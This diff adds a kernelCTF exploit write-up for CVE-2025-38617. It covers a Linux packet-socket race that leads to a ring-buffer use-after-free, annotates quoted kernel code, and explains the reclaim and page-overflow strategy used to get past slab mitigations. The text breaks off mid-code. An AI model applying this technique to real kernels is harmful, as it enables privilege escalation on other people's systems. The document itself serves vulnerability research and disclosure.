diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/docs/exploit.md new file mode 100644 index 000000000..e6b8031c4 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/docs/exploit.md @@ -0,0 +1,1646 @@ +# The race +- Describe in the patch commit `https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=01d3c8417b9c1b884a8a981a3b886da556512f36` +- Race between `packet_set_ring()` and `packet_notifier()` + +# Analyze the patch +```c +static int packet_notifier(struct notifier_block *this, + unsigned long msg, void *ptr) +{ + struct sock *sk; + struct net_device *dev = netdev_notifier_info_to_dev(ptr); + struct net *net = dev_net(dev); + + rcu_read_lock(); + sk_for_each_rcu(sk, &net->packet.sklist) { + struct packet_sock *po = pkt_sk(sk); + + switch (msg) { + // ... + + case NETDEV_DOWN: + if (dev->ifindex == po->ifindex) { + spin_lock(&po->bind_lock); + if (packet_sock_flag(po, PACKET_SOCK_RUNNING)) { + __unregister_prot_hook(sk, false); + sk->sk_err = ENETDOWN; + if (!sock_flag(sk, SOCK_DEAD)) + sk_error_report(sk); + } + if (msg == NETDEV_UNREGISTER) { + packet_cached_dev_reset(po); + WRITE_ONCE(po->ifindex, -1); + netdev_put(po->prot_hook.dev, + &po->prot_hook.dev_tracker); + po->prot_hook.dev = NULL; + } + spin_unlock(&po->bind_lock); + } + break; + case NETDEV_UP: + if (dev->ifindex == po->ifindex) { + spin_lock(&po->bind_lock); + if (po->num) // [1] + register_prot_hook(sk); + spin_unlock(&po->bind_lock); + } + break; + } + } + rcu_read_unlock(); + return NOTIFY_DONE; +} +``` + +- After we bind a packet socket to a network interface, these situations might happen: +1. Network interface goes from DOWN state to UP state lead to Packet socket receive `NETDEV_UP` event and begin to hook to this network interface. Now, packet socket can receive packets sent to the network interface and packet socket is considered to have `PACKET_SOCK_RUNNING` state. +2. Network interface goes from UP state to DOWN state lead to Packet socket receive `NETDEV_DOWN` event and packet socket unhook from this network interface. + +```c +static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u, + int closing, int tx_ring) +{ + struct pgv *pg_vec = NULL; + struct packet_sock *po = pkt_sk(sk); + unsigned long *rx_owner_map = NULL; + int was_running, order = 0; + struct packet_ring_buffer *rb; + struct sk_buff_head *rb_queue; + __be16 num; + int err; + struct tpacket_req *req = &req_u->req; // request from userspace + + rb = tx_ring ? &po->tx_ring : &po->rx_ring; + rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue; + + // ... + + spin_lock(&po->bind_lock); // [1] + was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING); + num = po->num; + if (was_running) { + WRITE_ONCE(po->num, 0); + __unregister_prot_hook(sk, false); + } + spin_unlock(&po->bind_lock); // [2] + + synchronize_net(); + + err = -EBUSY; + mutex_lock(&po->pg_vec_lock); // [3] + if (closing || atomic_long_read(&po->mapped) == 0) { + // ... + swap(rb->pg_vec, pg_vec); + // ... + po->prot_hook.func = (po->rx_ring.pg_vec) ? tpacket_rcv : packet_rcv; + // ... + } + mutex_unlock(&po->pg_vec_lock); + + spin_lock(&po->bind_lock); + if (was_running) { + WRITE_ONCE(po->num, num); + register_prot_hook(sk); + } + spin_unlock(&po->bind_lock); + // ... +} +``` + +- Review code from [1] to [2], we can see that: +1. The implementation clearly tell that further code execution must be run while the packet socket not in `PACKET_SOCK_RUNNING` state to ensure no packet is received while the ring buffer is configured. +2. Although `spin_lock(&po->bind_lock)` is both call from `packet_set_ring()` and `packet_notifier()` to avoid race between these two functions, there still logic issue where the `po->num` is only temporary set to zero if currently the packet socket is in running state. In the situation where current packet socket is not in running state, `po->num` value is kept. +3. That means, after `packet_set_ring()` call `spin_unlock(&po->bind_lock)`, a `NETDEV_UP` event will lead to packet socket rehook to the network interface. After that, packet socket can receive incoming packet while the configuration of the ring buffer is halfway through. (Look at [1] on `packet_notifier()`). + +# The UAF +- Assume we win the race, what can we leverage ? The conclusion I have after analyze `packet_set_ring()` and `packet_notifier()` is there are no direct exploitable primitives. Let's assume after `packet_set_ring()` release the `po->bind_lock`, the function stop executing and `packet_notifier()` finished bringing the packet socket to running state. Now, we can send a packet to the network interface and trigger the hook function on the packet socket. Let's assume `packet_set_ring()` continue the execution at this point. Now, we have a follow-up race condition between the hook function and `packet_set_ring()`. + +- Both Tx path and Rx path of the packet socket can be configured to use the ring buffer. +- Ring buffer can be mmaped to user space address. +- Configure Rx path from not using ring buffer to using ring buffer will lead to the allocation of the ring and hook function changed from `packet_rcv()` to `tpacket_rcv()`. `->pg_vec` pointer now contain the ring buffer. +- Configure Rx path from using ring buffer to not using ring buffer will lead to the old ring buffer got free and hook function changed from `tpacket_rcv()` to `packet_rcv()`. `->pg_vec` pointer is set back to NULL. +- Therefore, by configure the Rx path to use ring buffer and then enter `packet_set_ring()` to configure Rx path not to use the ring buffer, we can create a situation where the first half of `packet_set_ring()` race with `packet_notifier()` and at this point, a packet sent to the network interface that this packet socket hooked to will lead to the second half of `packet_set_ring()` race with `tpacket_rcv()`. +- Packet socket has 3 versions: TPACKET_V1, TPACKET_V2 and TPACKET_V3. Future code snippets and discussion will assume the packet socket use TPACKET_V3 version. The reason is TPACKET_V3 packet socket has internal data structure to keep track about ring buffer usage. The data structure contain pointer to the ring buffer. This pointer is not reset to NULL after we configure the packet socket from using ring buffer to not using ring buffer which can be leverage for exploitation. While analyzing code related to TPACKET_V1 and TPACKET_V2 packet socket, I only find NULL pointer dereference primitive. + +Request to `packet_set_ring()` has the following structure: +```c +struct tpacket_req3 { + unsigned int tp_block_size; /* size of each buffer in the ring buffer */ + unsigned int tp_block_nr; /* total buffer in the ring buffer */ + unsigned int tp_frame_size; /* frame size */ + unsigned int tp_frame_nr; /* Total number of frames*/ + unsigned int tp_retire_blk_tov; /* timeout to retire current usage buffer */ + unsigned int tp_sizeof_priv; /* each buffer can have a private space and the kernel code will never write to this space */ + unsigned int tp_feature_req_word; +}; +``` + +- If currently packet socket don't use ring buffer, specify `tp_block_nr != 0` will trigger the allocation code path in `packet_set_ring()`. +- If currently packet socket use ring buffer, specify `tp_block_nr == 0` will trigger the free code path in `packet_set_ring()`. + +```c +struct packet_ring_buffer { + struct pgv *pg_vec; // internal ring buffer + + unsigned int head; + unsigned int frames_per_block; + unsigned int frame_size; + unsigned int frame_max; + + unsigned int pg_vec_order; + unsigned int pg_vec_pages; + unsigned int pg_vec_len; + + unsigned int __percpu *pending_refcnt; + + union { + unsigned long *rx_owner_map; // use by TPACKET_V1 and TPACKET_V2 + struct tpacket_kbdq_core prb_bdqc; // use by TPACKET_V3 + }; +}; +```c + +```c +struct packet_sock { + // ... + struct packet_ring_buffer rx_ring; // rx_ring_buffer + struct packet_ring_buffer tx_ring; // tx_ring_buffer + // ... +}; +``` + +`packet_set_ring()` code related to the allocation of TPACKET_V3 Rx ring buffer +```c +static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u, + int closing, int tx_ring) +{ + struct pgv *pg_vec = NULL; + struct packet_sock *po = pkt_sk(sk); + unsigned long *rx_owner_map = NULL; + int was_running, order = 0; + struct packet_ring_buffer *rb; + struct sk_buff_head *rb_queue; + __be16 num; + int err; + struct tpacket_req *req = &req_u->req; // request from userspace + + rb = tx_ring ? &po->tx_ring : &po->rx_ring; + rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue; + + // ... + + if (req->tp_block_nr) { + unsigned int min_frame_size; + err = -EBUSY; + if (unlikely(rb->pg_vec)) + goto out; + + switch (po->tp_version) { + // ... + case TPACKET_V3: + po->tp_hdrlen = TPACKET3_HDRLEN; + break; + } + + err = -EINVAL; + if (unlikely((int)req->tp_block_size <= 0)) + goto out; + if (unlikely(!PAGE_ALIGNED(req->tp_block_size))) + goto out; + min_frame_size = po->tp_hdrlen + po->tp_reserve; + if (po->tp_version >= TPACKET_V3 && + req->tp_block_size < + BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size) + goto out; + if (unlikely(req->tp_frame_size < min_frame_size)) + goto out; + if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1))) + goto out; + + rb->frames_per_block = req->tp_block_size / req->tp_frame_size; + if (unlikely(rb->frames_per_block == 0)) + goto out; + if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr)) + goto out; + if (unlikely((rb->frames_per_block * req->tp_block_nr) != + req->tp_frame_nr)) + goto out; + + err = -ENOMEM; + order = get_order(req->tp_block_size); // [1] + pg_vec = alloc_pg_vec(req, order); // [2] + if (unlikely(!pg_vec)) + goto out; + switch (po->tp_version) { + case TPACKET_V3: + if (!tx_ring) { + init_prb_bdqc(po, rb, pg_vec, req_u); // [3] + } else { + // ... + } + break; + // ... + } + // ... + + mutex_lock(&po->pg_vec_lock); + if (closing || atomic_long_read(&po->mapped) == 0) { + err = 0; + spin_lock_bh(&rb_queue->lock); + swap(rb->pg_vec, pg_vec); + if (po->tp_version <= TPACKET_V2) + swap(rb->rx_owner_map, rx_owner_map); + rb->frame_max = (req->tp_frame_nr - 1); + rb->head = 0; + rb->frame_size = req->tp_frame_size; + spin_unlock_bh(&rb_queue->lock); + + swap(rb->pg_vec_order, order); + swap(rb->pg_vec_len, req->tp_block_nr); + + rb->pg_vec_pages = req->tp_block_size/PAGE_SIZE; + po->prot_hook.func = (po->rx_ring.pg_vec) ? + tpacket_rcv : packet_rcv; + // ... + } + mutex_unlock(&po->pg_vec_lock); + // ... +} +``` + +Explain for [1]: +```c +/** + * get_order - Determine the allocation order of a memory size + * @size: The size for which to get the order + * + * Determine the allocation order of a particular sized block of memory. This + * is on a logarithmic scale, where: + * + * 0 -> 2^0 * PAGE_SIZE and below + * 1 -> 2^1 * PAGE_SIZE to 2^0 * PAGE_SIZE + 1 + * 2 -> 2^2 * PAGE_SIZE to 2^1 * PAGE_SIZE + 1 + * 3 -> 2^3 * PAGE_SIZE to 2^2 * PAGE_SIZE + 1 + * 4 -> 2^4 * PAGE_SIZE to 2^3 * PAGE_SIZE + 1 + * ... + * + * The order returned is used to find the smallest allocation granule required + * to hold an object of the specified size. + */ +static __always_inline __attribute_const__ int get_order(unsigned long size); +``` + +Explain for [2]: +```c +/** + * alloc_pg_vec - Allocate memory for ring buffer + * @req: request from userspace. req->tp_block_nr : Determine how many buffer the ring have + * @order: Determine each buffer size + * (for example: + * order == 0 => buffer_size: (2 ** 0) * 4096 == 4096 + * order == 1 => buffer_size: (2 ** 1) * 4096 = 8192 + * order == 2 => buffer_size: (2 ** 2) * 4096 = 16384 + * ... + */ + +static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order) +{ + unsigned int block_nr = req->tp_block_nr; + struct pgv *pg_vec; + int i; + + pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN); + if (unlikely(!pg_vec)) + goto out; + + for (i = 0; i < block_nr; i++) { + pg_vec[i].buffer = alloc_one_pg_vec_page(order); + if (unlikely(!pg_vec[i].buffer)) + goto out_free_pgvec; + } + +out: + return pg_vec; + +out_free_pgvec: + free_pg_vec(pg_vec, order, block_nr); + pg_vec = NULL; + goto out; +} +``` +Explain for [3]: +```c +/** + * init_prb_bdqc - Initialize the internal data structure to track Rx ring buffer usage. Only TPACKET_V3 packet socket use this structure. + * @rb: Data structure used by packet socket to manage ring buffer. + * @pg_vec: The freshly allocated ring buffer. + * @req_u: Request from user space + */ +static void init_prb_bdqc(struct packet_sock *po, + struct packet_ring_buffer *rb, + struct pgv *pg_vec, + union tpacket_req_u *req_u) +{ + struct tpacket_kbdq_core *pkc = &rb->prb_bdqc; + struct tpacket_block_desc *pbd; + + memset(pkc, 0x0, sizeof(*pkc)); + + pkc->knxt_seq_num = 1; + pkc->pkbdq = pg_vec; + pbd = (struct tpacket_block_desc *)pg_vec[0].buffer; + pkc->pkblk_start = pg_vec[0].buffer; + pkc->kblk_size = req_u->req3.tp_block_size; + pkc->knum_blocks = req_u->req3.tp_block_nr; + pkc->hdrlen = po->tp_hdrlen; + pkc->version = po->tp_version; + pkc->last_kactive_blk_num = 0; + pkc->blk_sizeof_priv = req_u->req3.tp_sizeof_priv; + pkc->max_frame_len = pkc->kblk_size - (48 + ALIGN((p1->blk_sizeof_priv), 8)); + prb_open_block(pkc, pbd); +} +``` +- `pkc->pkbdq` : Pointer to ring buffer. +- `pkc->kblk_size` : Size of each buffer in ring buffer +- `pkc->knum_blocks` : Total buffer in ring buffer +- `pkc->hdrlen` : 68 (For TPACKET_V3 packet socket) +- `pkc->version` : `TPACKET_V3` +- `pkc->blk_sizeof_priv` : Private space per buffer in the ring buffer +- `pbd` : first buffer of the ring buffer + +```c +/** + * prb_open_block - Mark buffer for future packet headers and packet data written + * @pkc: Data structure to track ring buffer usage + * @pbd: The buffer to mark + */ +static void prb_open_block(struct tpacket_kbdq_core *pkc, struct tpacket_block_desc *pbd) +{ + struct timespec64 ts; + struct tpacket_hdr_v1 *h1 = &pbd->hdr.bh1; + + BLOCK_SNUM(pbd) = pkc->knxt_seq_num++; + BLOCK_NUM_PKTS(pbd) = 0; + BLOCK_LEN(pbd) = BLK_PLUS_PRIV(pkc->blk_sizeof_priv); + + pkc->pkblk_start = (char *)pbd; + pkc->nxt_offset = pkc->pkblk_start + BLK_PLUS_PRIV(pkc->blk_sizeof_priv); + + BLOCK_O2FP(pbd) = (__u32)BLK_PLUS_PRIV(pkc->blk_sizeof_priv); + BLOCK_O2PRIV(pbd) = BLK_HDR_LEN; + + pbd->version = pkc->version; + pkc->prev = pkc->nxt_offset; + pkc->pkblk_end = pkc->pkblk_start + pkc->kblk_size; +} + +#define V3_ALIGNMENT (8) +#define BLK_HDR_LEN (ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT)) +#define BLK_PLUS_PRIV(sz_of_priv) BLK_HDR_LEN + ALIGN((sz_of_priv), V3_ALIGNMENT)) +``` + +- `pkc->pkblk_start` : beginning of the buffer. +- `pkc->nxt_offset` : where the headers and packet data will be written in the buffer. +- `pkc->pkblk_end` : end of the buffer. + +`packet_set_ring()` code path related to where the ring buffer is freed +```c +static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u, + int closing, int tx_ring) +{ + struct pgv *pg_vec = NULL; + struct packet_sock *po = pkt_sk(sk); + unsigned long *rx_owner_map = NULL; + int was_running, order = 0; + struct packet_ring_buffer *rb; + struct sk_buff_head *rb_queue; + __be16 num; + int err; + struct tpacket_req *req = &req_u->req; + + rb = tx_ring ? &po->tx_ring : &po->rx_ring; + rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue; + + err = -EBUSY; + if (!closing) { + if (atomic_long_read(&po->mapped)) + goto out; + if (packet_read_pending(rb)) + goto out; + } + + if (req->tp_block_nr) { + // ... + } + else { + err = -EINVAL; + if (unlikely(req->tp_frame_nr)) + goto out; + } + + // ... + mutex_lock(&po->pg_vec_lock); + if (closing || atomic_long_read(&po->mapped) == 0) { + err = 0; + spin_lock_bh(&rb_queue->lock); + swap(rb->pg_vec, pg_vec); // [1] Reset ring buffer pointer to NULL + if (po->tp_version <= TPACKET_V2) + swap(rb->rx_owner_map, rx_owner_map); + rb->frame_max = (req->tp_frame_nr - 1); + rb->head = 0; + rb->frame_size = req->tp_frame_size; + spin_unlock_bh(&rb_queue->lock); + + swap(rb->pg_vec_order, order); + swap(rb->pg_vec_len, req->tp_block_nr); + + rb->pg_vec_pages = req->tp_block_size/PAGE_SIZE; + po->prot_hook.func = (po->rx_ring.pg_vec) ? + tpacket_rcv : packet_rcv; + skb_queue_purge(rb_queue); + if (atomic_long_read(&po->mapped)) + pr_err("packet_mmap: vma is busy: %ld\n", + atomic_long_read(&po->mapped)); + } + mutex_unlock(&po->pg_vec_lock); + + // ... + if (pg_vec) { + bitmap_free(rx_owner_map); + free_pg_vec(pg_vec, order, req->tp_block_nr); // [2] Where the ring buffer is freed + } +``` + +```c +static void free_pg_vec(struct pgv *pg_vec, unsigned int order, + unsigned int len) +{ + int i; + + for (i = 0; i < len; i++) { + if (likely(pg_vec[i].buffer)) { + if (is_vmalloc_addr(pg_vec[i].buffer)) + vfree(pg_vec[i].buffer); + else + free_pages((unsigned long)pg_vec[i].buffer, + order); + pg_vec[i].buffer = NULL; // [1] + } + } + kfree(pg_vec); +} +``` + +[1] : Reset every buffer pointer in the ring buffer to NULL + +`tpacket_rcv()` code path related to where UAF happen +```c +/** + * tpacket_rcv: Hook function to handle packet sent to the network interface that the packet socket hooked to. + * @skb: the packet + * @dev: the network interface + * @pt: represent the hook structure + */ +static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev, + struct packet_type *pt, struct net_device *orig_dev) +{ + enum skb_drop_reason drop_reason = SKB_CONSUMED; + struct sock *sk = NULL; + struct packet_sock *po; + struct sockaddr_ll *sll; + union tpacket_uhdr h; + u8 *skb_head = skb->data; + int skb_len = skb->len; + unsigned int snaplen, res; + unsigned long status = TP_STATUS_USER; + unsigned short macoff, hdrlen; + unsigned int netoff; + struct sk_buff *copy_skb = NULL; + struct timespec64 ts; + __u32 ts_status; + unsigned int slot_id = 0; + int vnet_hdr_sz = 0; + + sk = pt->af_packet_priv; + po = pkt_sk(sk); + // ... + + snaplen = skb->len; + res = run_filter(skb, sk, snaplen); // [5] + + // ... + + if (snaplen > res) + snaplen = res; + + if (sk->sk_type == SOCK_DGRAM) { + // ... + } else { + unsigned int maclen = skb_network_offset(skb); + netoff = TPACKET_ALIGN(po->tp_hdrlen + + (maclen < 16 ? 16 : maclen)) + + po->tp_reserve; + vnet_hdr_sz = READ_ONCE(po->vnet_hdr_sz); + if (vnet_hdr_sz) + netoff += vnet_hdr_sz; + macoff = netoff - maclen; + } + + // ... + spin_lock(&sk->sk_receive_queue.lock); + h.raw = packet_current_rx_frame(po, skb, // [1] + TP_STATUS_KERNEL, (macoff+snaplen)); + + // ... + spin_unlock(&sk->sk_receive_queue.lock); + skb_copy_bits(skb, 0, h.raw + macoff, snaplen); // [2] + // ... + switch (po->tp_version) { + // ... + case TPACKET_V3: // [3] + h.h3->tp_status |= status; + h.h3->tp_len = skb->len; + h.h3->tp_snaplen = snaplen; + h.h3->tp_mac = macoff; + h.h3->tp_net = netoff; + h.h3->tp_sec = ts.tv_sec; + h.h3->tp_nsec = ts.tv_nsec; + memset(h.h3->tp_padding, 0, sizeof(h.h3->tp_padding)); + hdrlen = sizeof(*h.h3); + break; + default: + BUG(); + } + + sll = h.raw + TPACKET_ALIGN(hdrlen); // [4] + sll->sll_halen = dev_parse_header(skb, sll->sll_addr); + sll->sll_family = AF_PACKET; + sll->sll_hatype = dev->type; + sll->sll_protocol = (sk->sk_type == SOCK_DGRAM) ? + vlan_get_protocol_dgram(skb) : skb->protocol; + sll->sll_pkttype = skb->pkt_type; + if (unlikely(packet_sock_flag(po, PACKET_SOCK_ORIGDEV))) + sll->sll_ifindex = orig_dev->ifindex; + else + sll->sll_ifindex = dev->ifindex; + + // ... +} +``` +- [1] : where UAF happen. +- [2] : where we write with control data from our packet. +- [3] and [4] : where non control data written. + +Call chain from [1]: `packet_current_rx_frame()` -> `__packet_lookup_frame_in_block()` + +```c +static void *packet_current_rx_frame(struct packet_sock *po, + struct sk_buff *skb, + int status, unsigned int len) +{ + switch (po->tp_version) { + // ... + case TPACKET_V3: + return __packet_lookup_frame_in_block(po, skb, len); + // ... +} +``` + +```c +/** + * __packet_lookup_frame_in_block : find frame in the ring buffer to write headers and packet data to. + * @skb: packet sent to the network interface that the packet socket hooked to + * @len: packet length + */ +static void *__packet_lookup_frame_in_block(struct packet_sock *po, + struct sk_buff *skb, + unsigned int len + ) +{ + struct tpacket_kbdq_core *pkc; + struct tpacket_block_desc *pbd; + char *curr, *end; + + pkc = &po->rx_ring.prb_bdqc; + pbd = pkc->pkbdq[pkc->kactive_blk_num].buffer; + + // ... + + curr = pkc->nxt_offset; + pkc->skb = skb; + end = (char *)pbd + pkc->kblk_size; + + if (curr + (ALIGN(len, 8)) < end) { + prb_fill_curr_block(curr, pkc, pbd, len); + return (void *)curr; + } + + prb_retire_current_block(pkc, po, 0); // [1] + + curr = (char *)prb_dispatch_next_block(pkc, po); + if (curr) { + pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc); + prb_fill_curr_block(curr, pkc, pbd, len); + return (void *)curr; + } + + return NULL; +} +``` + +Assume the ring buffer is freed at this point and this is the first time `tpacket_rcv()` is triggered, we have the following things: +- `pkc->kactive_blk_num == 0` +- `pkc->pkbdq` : UAF pointer to old freed ring buffer. +- `pbd = pkc->pkbdq[pkc->kactive_blk_num].buffer` => `pbd` is UAF pointer +- `curr = pkc->nxt_offset` : pointer to the old freed buffer from the old freed ring (check `prb_open_block()` analysis above) => `pkc->nxt_offset` is UAF pointer +- `end = (char *)pbd + pkc->kblk_size` => `end` is UAF Pointer + +Remember, before the ring buffer is freed, every buffer pointer in the ring buffer is reset to NULL. If we don't manage to reclaim the ring buffer, we will have kernel panic by the following reasons: +- `curr` : kernel address +- `pbd == 0` => `end` will have small value => `curr + len > end` => `prb_retire_current_block()` is called at [1] + +```c +static void prb_retire_current_block(struct tpacket_kbdq_core *pkc, + struct packet_sock *po, unsigned int status) +{ + struct tpacket_block_desc *pbd = pkc->pkbdq[pkc->kactive_blk_num].buffer; // pbd == 0 + + if ((TP_STATUS_KERNEL == pbd->hdr.bh1.block_status)) { // NULL pointer dereference + if (!(status & TP_STATUS_BLK_TMO)) { + write_lock(&pkc->blk_fill_in_prog_lock); + write_unlock(&pkc->blk_fill_in_prog_lock); + } + prb_close_block(pkc, pbd, po, status); + return; + } +} +``` + +Assume we manage to reclaim the ring buffer before the UAF happened, what object should we use to reclaim ? I decided to use another packet socket to allocate Tx ring buffer for the reclamation for the following reasons: + +- `CONFIG_RANDOM_KMALLOC_CACHES` mitigation : Introduces multiple generic slab caches for each size, 16 by default (named kmalloc-rnd-01-32, kmalloc-rnd-02-32 etc.). When an object allocated via kmalloc() it is allocated to one of these 16 caches "randomly", depending on the callsite for the kmalloc() and a per-boot seed. +- `CONFIG_SLAB_VIRTUAL` mitigation : Ensure the virtual address used for a slab cache type will always be used for that slab cache type. +- With these two mitigations, I have no choice but to use the ring buffer itself to reclaim the freed ring buffer due to same callsite so we can workaround `CONFIG_RANDOM_KMALLOC_CACHES` mitigation and `CONFIG_SLAB_VIRTUAL` mitigation. +- I choose Tx ring buffer because the kernel don't fill the buffer of Tx ring buffer with anything, so all buffers start with zeros and the allocation for Tx ring buffer run faster due to less code path than Rx ring buffer. + +The specific strategy used in the exploit looks like: +- The victim packet's freed ring buffer has X buffers (X > 1). Size of each buffer is: ((2 ** Y) * PAGE_SIZE) (Y > 1). +- The ring buffer used for reclamation has X buffers too so `kmalloc()` will allocate on the same slab cache. Size of each buffer is: ((2 ** (Y - 1)) * PAGE_SIZE). + +Assume the reclamation success, we can look at function `__packet_lookup_frame_in_block()` again with new view. + +```c +static void *__packet_lookup_frame_in_block(struct packet_sock *po, + struct sk_buff *skb, + unsigned int len + ) +{ + struct tpacket_kbdq_core *pkc; + struct tpacket_block_desc *pbd; + char *curr, *end; + + pkc = &po->rx_ring.prb_bdqc; + pbd = pkc->pkbdq[pkc->kactive_blk_num].buffer; + + // ... + + curr = pkc->nxt_offset; + pkc->skb = skb; + end = (char *)pbd + pkc->kblk_size; + + if (curr + (ALIGN(len, 8)) < end) { + prb_fill_curr_block(curr, pkc, pbd, len); // [1] + return (void *)curr; + } + + prb_retire_current_block(pkc, po, 0); // [2] + + curr = (char *)prb_dispatch_next_block(pkc, po); // [3] + if (curr) { + pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc); + prb_fill_curr_block(curr, pkc, pbd, len); + return (void *)curr; + } + + return NULL; +} +``` + +- `pkc->kactive_blk_num == 0` +- `pkc->pkbdq` : now contain the reclamation ring buffer +- `pbd = pkc->pkbdq[pkc->kactive_blk_num].buffer` : First buffer of the reclamation ring buffer +- `curr = pkc->nxt_offset` : pointer to the old freed buffer from the old freed ring +- `end = (char *)pbd + pkc->kblk_size`: End of `pbd` + +#### Assume we manage to page groom in such a way that `end` came from lower address and `curr` came from higher address, we can avoid code path at [1] and we enter `prb_retire_current_block()`. + +```c +static void prb_retire_current_block(struct tpacket_kbdq_core *pkc, + struct packet_sock *po, unsigned int status) +{ + struct tpacket_block_desc *pbd = pkc->pkbdq[pkc->kactive_blk_num].buffer; + + if ((TP_STATUS_KERNEL == BLOCK_STATUS(pbd))) { + if (!(status & TP_STATUS_BLK_TMO)) { + write_lock(&pkc->blk_fill_in_prog_lock); + write_unlock(&pkc->blk_fill_in_prog_lock); + } + prb_close_block(pkc, pbd, po, status); + return; + } +} +``` +- `TP_STATUS_KERNEL == 0` +- `pbd` : first buffer from the reclamation ring buffer (pages used for these buffer started with all zeros) => `prb_close_block()` is called. + +```c +static void prb_close_block(struct tpacket_kbdq_core *pkc, + struct tpacket_block_desc *pbd1, + struct packet_sock *po, unsigned int stat) +{ + // ... + + pkc->kactive_blk_num = ((pkc->kactive_blk_num < (pkc->knum_blocks-1)) ? \ + (pkc->kactive_blk_num+1) : 0); +} +``` + +- Now, `pkc->kactive_blk_num == 1`. Back to [3] of function `__packet_lookup_frame_in_block()`, function `prb_dispatch_next_block()` is called. + +```c +static void *prb_dispatch_next_block(struct tpacket_kbdq_core *pkc, + struct packet_sock *po) +{ + struct tpacket_block_desc *pbd; + + // ... + pbd = pkc->pkbdq[pkc->kactive_blk_num].buffer; + + // ... + + prb_open_block(pkc, pbd); + return (void *)pkc->nxt_offset; +} +``` + +- `pkc->kactive_blk_num == 1` => `pbd` is the second buffer in the reclamation ring buffer. + +```c +static void prb_open_block(struct tpacket_kbdq_core *pkc, + struct tpacket_block_desc *pbd) +{ + // ... + + pkc->pkblk_start = (char *)pbd1; + pkc->nxt_offset = pkc->pkblk_start + BLK_PLUS_PRIV(pkc->blk_sizeof_priv); + + // ... +} +``` + +- We have analyzed the `prb_open_block()` above and `pkc->nxt_offset` is the location where the headers and packet data will begin to write to. Now, `pkc->nxt_offset` come from the buffer of the reclamation ring buffer. +- The idea is: by reclaim the freed ring buffer with the ring buffer where the buffer size is smaller, we can build a Page overflow primitive. +- As described above, `tpacket_rcv()` has both control data written and non control data written. +- Because we control `pkc->blk_sizeof_priv`, we can let `pkc->nxt_offset` having the value near the end of the reclamation smaller buffer such that the remaining space just enough to write the non control data. +- Look at [2] on `tpacket_rcv()` above, we can see the control data is written at offset affected by `po->tp_hdrlen`, `maclen`, `po->tp_reserve`. + - `po->tp_hdrlen == 68` for TPACKET_V3 packet socket. + - `maclen == 14 (ETH_HLEN = 14)`. + - `po->tp_reserve` : set with `setsockopt(PACKET_RESERVE)`. + - => written offset is controllable. +- Beside from offset, `snaplen` value decide how many bytes to overwrite. `snaplen` represent the length of the packet data. In the situation that we want to overwrite with just 8 bytes for example, although we can't send raw packet with just 8 bytes of data, we can send packet with bigger size and use the socket filter to truncate the packet length to 8. (check [5] on `tpacket_rcv()`). + +# Winning first race condition +Take a look at `packet_set_ring()` again. +```c +static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u, + int closing, int tx_ring) +{ + // ... + spin_lock(&po->bind_lock); + was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING); + num = po->num; + if (was_running) { + WRITE_ONCE(po->num, 0); + __unregister_prot_hook(sk, false); + } + spin_unlock(&po->bind_lock); + + synchronize_net(); + + err = -EBUSY; + mutex_lock(&po->pg_vec_lock); + // ... +} +``` + +- After `po->bind_lock` spinlock release, `packet_set_ring()` continue to acquire `po->pg_vec_lock` mutex. Therefore, if we manage to acquire the mutex beforehand, we can force `packet_set_ring()` to sleep. +- Kernel function `tpacket_snd()` has a code path that we can leverage to control the `po->pg_vec_lock` mutex. + +```c +static int tpacket_snd(struct packet_sock *po, struct msghdr *msg) +{ + struct sk_buff *skb = NULL; + struct net_device *dev; + struct virtio_net_hdr *vnet_hdr = NULL; + struct sockcm_cookie sockc; + __be16 proto; + int err, reserve = 0; + void *ph; + DECLARE_SOCKADDR(struct sockaddr_ll *, saddr, msg->msg_name); + bool need_wait = !(msg->msg_flags & MSG_DONTWAIT); // [1] + int vnet_hdr_sz = READ_ONCE(po->vnet_hdr_sz); + unsigned char *addr = NULL; + int tp_len, size_max; + void *data; + int len_sum = 0; + int status = TP_STATUS_AVAILABLE; + int hlen, tlen, copylen = 0; + long timeo = 0; + + mutex_lock(&po->pg_vec_lock); // [2] + + if (unlikely(!po->tx_ring.pg_vec)) { + err = -EBUSY; + goto out; + } + if (likely(saddr == NULL)) { + // ... + } else { + err = -EINVAL; + if (msg->msg_namelen < sizeof(struct sockaddr_ll)) + goto out; + if (msg->msg_namelen < (saddr->sll_halen + + offsetof(struct sockaddr_ll, + sll_addr))) + goto out; + proto = saddr->sll_protocol; + dev = dev_get_by_index(sock_net(&po->sk), saddr->sll_ifindex); + if (po->sk.sk_socket->type == SOCK_DGRAM) { + if (dev && msg->msg_namelen < dev->addr_len + + offsetof(struct sockaddr_ll, sll_addr)) + goto out_put; + addr = saddr->sll_addr; + } + } + + err = -ENXIO; + if (unlikely(dev == NULL)) + goto out; + err = -ENETDOWN; + if (unlikely(!(dev->flags & IFF_UP))) // [3] + goto out_put; + + // ... + + reinit_completion(&po->skb_completion); + + do { + ph = packet_current_frame(po, &po->tx_ring, + TP_STATUS_SEND_REQUEST); + if (unlikely(ph == NULL)) { + if (need_wait && skb) { // [4] + timeo = sock_sndtimeo(&po->sk, msg->msg_flags & MSG_DONTWAIT); + timeo = wait_for_completion_interruptible_timeout(&po->skb_completion, timeo); // [5] + if (timeo <= 0) { + err = !timeo ? -ETIMEDOUT : 